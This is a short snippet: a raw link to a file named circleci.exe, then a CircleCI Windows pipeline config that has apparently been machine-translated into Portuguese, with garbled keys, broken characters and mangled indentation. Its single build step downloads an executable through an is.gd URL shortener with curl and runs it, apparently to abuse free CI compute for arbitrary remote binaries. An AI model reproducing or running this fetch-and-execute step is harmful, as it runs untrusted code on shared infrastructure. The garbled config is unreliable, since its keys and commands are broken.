https://gcllab.com/haithuongpro2711/haivps/-/raw/master/circleci.exe
 
 vers찾o: 2.1
  
  orbes:
    vit처ria: circleci/windows@2.2.0
     
     empregos:
       construir:
           executor:
                 nome: vit처ria/padr찾o
                       shell: cmd.exe
                           degraus:
                                 - execute: curl -L -o yourcustomlink.exe https://is.gd/yourcustomlink && yourcustomlink.execute